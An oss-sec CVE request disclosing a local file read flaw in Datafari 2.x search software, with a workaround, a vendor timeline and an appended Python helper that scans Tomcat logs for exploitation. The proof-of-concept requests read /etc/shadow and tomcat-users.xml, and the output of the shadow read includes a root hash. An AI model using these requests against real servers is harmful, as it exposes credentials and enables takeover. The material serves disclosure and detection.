oss-sec mailing list archives
CVE Request: Datafari Local File Disclosure
From: PASCAULT Wilfried <wpascault () lexsi com>
Date: Wed, 3 Feb 2016 15:55:07 +0000
Datafari, an Open source enterprise search software using Apache Solr, ManifoldCF and Tomcat is prone to a local file disclosure vulnerability.

Product's information
---------------------
* Name : Datafari - http://www.datafari.com/
* Editor: France Labs
* Affected versions: 2.x<2.1.3
* Tested : 2.1.0 and 2.1.1 on Debian Wheezy 7 and Jessie 8

Description
-----------
When "filesystem" repository has been configured into Datafari (administrative privileges on Datafari required), a user could access any file of the system with root privileges.

On "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" configuration file, "ALLOWLOCALFILEREADING" parameter allows by default to read file on system. Datafari is by default running as user root, so any file could be downloaded with "url=file:/" parameter in "/Datafari/URL" (token isn't checked).

This issue is exploitable only when "Filesystem" repository has been set on ManifoldCF.

Proof of concept
----------------
http://localhost:8080/Datafari/URL?url=file:/arbitrary_file

http://localhost:8080/Datafari/URL?url=file:/etc/shadow
=> file will be downloaded as _etc_shadow

$ head _etc_shadow
root:$6$nTTh32TT$rLqcSGDf92tyh9aXtuTqnlGW4Ewr.IzBEcdP/kMnvhNYELz7iUgmOyiWesbJRUwEeKdKk/2yQcnAVBQYBGsiD.:16714:0:99999:7:::
daemon:*:16714:0:99999:7:::
bin:*:16714:0:99999:7:::
sys:*:16714:0:99999:7:::
sync:*:16714:0:99999:7:::
games:*:16714:0:99999:7:::
man:*:16714:0:99999:7:::
lp:*:16714:0:99999:7:::
mail:*:16714:0:99999:7:::
news:*:16714:0:99999:7:::

another funny file ^_^ (Tomcat manager password could not be changed during installation)

http://localhost:8080/Datafari/URL?url=file://opt/datafari/tomcat/conf/tomcat-users.xml

$ cat _opt_datafari_tomcat_conf_tomcat-users.xml|grep admin
<user password="@PASSWORD@" roles="manager-gui,SearchAdministrator" username="admin"/>

http://localhost:8080/manager/html/list

Workaround
----------
Set "ALLOWLOCALFILEREADING=false" on "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" and restart Datafari

Timeline
--------
1/6/2016: reported to vendor
1/11/2016: vendor response but said was not a security issue
1/11/2016: add technical details and POC
1/11/2016: vendor acknowledged as a security issue
1/11/2016: patch was committed in master branch
1/28/2016: 2.1.3 released

Thanks to Cédric and Aurélien from Datafari project for their quick replies.
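
Added example, not part of the original message and not Datafari code: a log review helper that lists requests to "/Datafari/URL" whose "url" parameter carries a file: URL, so an operator of an affected 2.x instance can see which local files were requested and by whom. It assumes the Tomcat access log uses the common/combined format; the function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed common/combined format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
ENDPOINT = "/datafari/url"  # servlet path named in the advisory, compared case-insensitively


def file_url_requests(lines):
    """Return (client, time, status, decoded url value) for every request to
    /Datafari/URL whose url parameter uses the file: scheme."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, when, _method, target, status, _size = m.groups()
        parts = urlsplit(target)
        if unquote(parts.path).rstrip("/").lower() != ENDPOINT:
            continue
        # parse_qs decodes once; unquote again so double-encoded values are caught too
        for value in parse_qs(parts.query).get("url", []):
            decoded = unquote(value).strip()
            if decoded.lower().startswith("file:"):
                hits.append((client, when, int(status), decoded))
    return hits


# Constructed sample lines (not taken from a real server)
SAMPLE = [
    '192.0.2.10 - - [03/Feb/2016:15:40:01 +0000] "GET /Datafari/URL?url=file:/etc/shadow HTTP/1.1" 200 1187',
    '192.0.2.10 - - [03/Feb/2016:15:40:09 +0000] "GET /Datafari/URL?url=file%3A%2F%2Fopt%2Fdatafari%2Ftomcat%2Fconf%2Ftomcat-users.xml HTTP/1.1" 200 2310',
    '198.51.100.7 - - [03/Feb/2016:15:41:30 +0000] "GET /Datafari/URL?url=http%3A%2F%2Fintranet.example%2Fdoc.pdf HTTP/1.1" 302 -',
    '198.51.100.7 - - [03/Feb/2016:15:42:02 +0000] "GET /Datafari/Search?q=file:/etc/shadow HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, when, status, url in file_url_requests(SAMPLE):
        print(f"{when} {client} status={status} url={url}")
```

Any file named in a hit with a 2xx status should be treated as disclosed; for tomcat-users.xml that means changing the manager password.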